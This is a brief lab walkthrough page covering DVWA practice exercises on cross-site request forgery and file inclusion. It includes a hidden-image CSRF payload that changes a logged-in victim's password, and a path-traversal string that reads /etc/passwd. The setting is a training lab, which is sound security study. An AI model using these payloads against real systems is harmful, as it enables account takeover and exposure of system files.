DVWA Exercises 3

05 CSRF Attack

Let's type in a password and grab the request in Burp

The attacker must prepare a Website with a manipulated string. This attack only works if the victim is logged in on the target website (session cookie must be valid) and clicks on the manipualted link.

Attackers Side:

cd /home/hacker
mkdir webroot
python3 -m http.server 8001

Create a html file with the following content:

<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">

Victim Side:

06 File Inclusion

Attack string:

http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwd

PreviousDVWA Exercises 2 NextDVWA Exercises 4

Last updated 2 years ago